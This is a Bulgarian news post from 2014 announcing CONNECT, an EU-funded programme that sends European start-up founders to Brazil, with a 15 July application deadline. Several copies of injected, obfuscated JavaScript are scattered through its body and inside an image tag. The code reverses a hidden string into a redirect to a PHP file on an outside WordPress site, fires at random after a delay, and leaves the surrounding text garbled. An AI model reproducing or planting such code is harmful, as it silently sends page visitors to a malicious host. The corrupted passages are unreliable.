На вниманието на всички предприемачи! Разберете какво е CONNECT сега!

July 1, 2014 in ОТТ Новини

CONNECT е насочена към европейски предприемачи, които започват собствен бизнес с потенциал за растеж в международен план.

Избраните предприемачи ще се впуснат в пълноценна програма за обмен в Бразилия, където те ще имат възможност да работят заедно и да се учат от опитен предприемач домакин.

КРАЕН СРОК ЗА КАНДИДАТСТВАНЕ: 15 Юли, 2014!

 

За CONNECT

КАКВО Е CONNECT?

CONNECT насърчава обмена на стартиращи предприемачи между Федеративна република Бразилия и Европа. Тя има за цел да подкрепи обещаващи предприемачи, малки и средни предприятия, за да израстнат и развият своята международна визия и конкурентоспособност. Насърчава се обмена на опит между Бразилия и участващите страни в Рамкова програма за Конкурентоспособност и Иновации 2007-2013 г. и повишаване на предприемачеството като цяло.

 

КАК?

CONNECT ще избере 50 високо мотивирани европейскинови предприемачи да се включат в схема за бизнес мобилност в Бразилия. Ще им се предложи уникалната възможност да си сътрудничат и да обменят знания с опитен и успешен предприемач домакин в Бразилия за период от 1 до 6 месеца. Престоят ще бъде финансиран частично от Европейската комисия.

 $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-sofia.com/wp-content/uploads/2014/07/about.png">about$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-sofia.com/wp-content/uploads/2014/07/about-300x158.png" width="300" height="158" />

CONNECT се финансира от Европейската комисия и оперира в участващите страни в Рамкова програма за Конкурентоспособност и Иновации 2007-2013 г.и Федеративна република Бразилия. Дейностите се координират на Европейско ниво от EBN - European Business toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and Innovation Centre Network.

Краен срок за кандидатстване: 15 Юли, 2014!

За повече информация и попълване на формуляр за участие, моля последвайте линка:

http://www.eubrazilconnect.com/?q=apply-here  .